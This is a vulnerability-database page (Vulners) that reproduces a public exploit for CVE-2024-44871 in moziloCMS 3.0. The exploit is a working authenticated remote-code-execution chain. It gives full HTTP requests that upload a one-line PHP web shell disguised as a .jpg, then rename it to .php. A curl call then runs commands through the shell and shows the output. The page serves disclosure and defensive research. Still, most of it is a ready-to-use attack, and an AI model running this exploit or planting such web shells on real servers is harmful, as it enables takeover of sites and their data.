Vulners
Lucene search
moziloCMS 3.0 Shell Upload
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | Exploit for Unrestricted Upload of File with Dangerous Type in Mozilo Mozilocms | 7 Apr 202518:07 | – | githubexploit |
 | CVE-2024-44871 | 10 Sep 202420:06 | – | circl |
 | moziloCMS 安全漏洞 | 10 Sep 202400:00 | – | cnnvd |
 | CVE-2024-44871 | 10 Sep 202400:00 | – | cve |
 | CVE-2024-44871 | 10 Sep 202400:00 | – | cvelist |
 | MoziloCMS 3.0 - Remote Code Execution (RCE) | 27 Mar 202500:00 | – | exploitdb |
 | CVE-2024-44871 | 10 Sep 202417:15 | – | nvd |
 | CVE-2024-44871 | 10 Sep 202417:15 | – | osv |
 | PT-2024-31290 · Mozilocms · Mozilocms | 10 Sep 202400:00 | – | ptsecurity |
 | CVE-2024-44871 | 23 May 202508:33 | – | redhatcve |
10
# Exploit Title: MoziloCMS 3.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 10/09/2024
# Exploit Author: Secfortress (https://github.com/sec-fortress)
# Vendor Homepage: https://mozilo.de/
# Software Link:
https://github.com/moziloDasEinsteigerCMS/mozilo3.0/archive/refs/tags/3.0.1.zip
# Version: 3.0
# Tested on: Debian
# Reference: https://vulners.com/cve/CVE-2024-44871
# CVE : CVE-2024-44871
"""
################
# Description #
################
MoziloCMS version 3.0 suffers from an arbitrary file upload vulnerability
in the component "/admin/index.php" which allows an authenticated attacker
to execute arbitrary code on the "Files" session by uploading a maliciously
crafted .JPG file and subsequently renaming its extension to .PHP using the
application's renaming function.
#####################
# PoC for webshell #
#####################
Steps to Reproduce:
1. Login as admin
2. Go to the Files session by the left menu
3. Create a .jpg file with it content having a php web shell
4. Upload the file to the server via the upload icon and save
5. Rename the file to .php on the web server and save
6. Access webshell via this endpoint :
http://127.0.0.1/mozilo3.0-3.0.1/kategorien/Willkommen/dateien/revshell.php
==========================
Request 1 => Upload File: #
==========================
POST /mozilo3.0-3.0.1/admin/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101
Firefox/115.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------186462060042780927583949521447
Content-Length: 607
Origin: http://127.0.0.1
DNT: 1
Connection: close
Referer:
http://127.0.0.1/mozilo3.0-3.0.1/admin/index.php?nojs=true&action=files&multi=true
Cookie: mozilo_editor_settings=true,false,mozilo,12px;
3f57633367583b9bf11d8e979ddc8e2b=gucvcppc86c62nnaefqjelq4ep;
PHPSESSID=p7qq7p1t9sg9ke03mnrp48ir5b;
MOZILOID_24b094c9c2b05ae0c5d9a85bc52a8ded=8civmp61qbc8hmlpg82tit1noo
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------186462060042780927583949521447
Content-Disposition: form-data; name="curent_dir"
Willkommen
-----------------------------186462060042780927583949521447
Content-Disposition: form-data; name="chancefiles"
true
-----------------------------186462060042780927583949521447
Content-Disposition: form-data; name="action"
files
-----------------------------186462060042780927583949521447
Content-Disposition: form-data; name="files[]"; filename="revshell.jpg"
Content-Type: image/jpeg
<?=`$_GET[0]`?>
-----------------------------186462060042780927583949521447--
===========================
Request 2 => Rename File: #
===========================
POST /mozilo3.0-3.0.1/admin/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101
Firefox/115.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 98
Origin: http://127.0.0.1
DNT: 1
Connection: close
Referer:
http://127.0.0.1/mozilo3.0-3.0.1/admin/index.php?nojs=true&action=files&multi=true
Cookie: mozilo_editor_settings=true,false,mozilo,12px;
3f57633367583b9bf11d8e979ddc8e2b=gucvcppc86c62nnaefqjelq4ep;
PHPSESSID=p7qq7p1t9sg9ke03mnrp48ir5b;
MOZILOID_24b094c9c2b05ae0c5d9a85bc52a8ded=8civmp61qbc8hmlpg82tit1noo
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
action=files&newfile=revshell.php&orgfile=revshell.jpg&curent_dir=Willkommen&changeart=file_rename
####################
# Webshell access: #
####################
# Wenshell access via curl:
curl
http://127.0.0.1/mozilo3.0-3.0.1/kategorien/Willkommen/dateien/revshell.php?0=whoami
# Output:
www-data
"""Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Mar 2025 00:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.17.2
EPSS0.29416
SSVC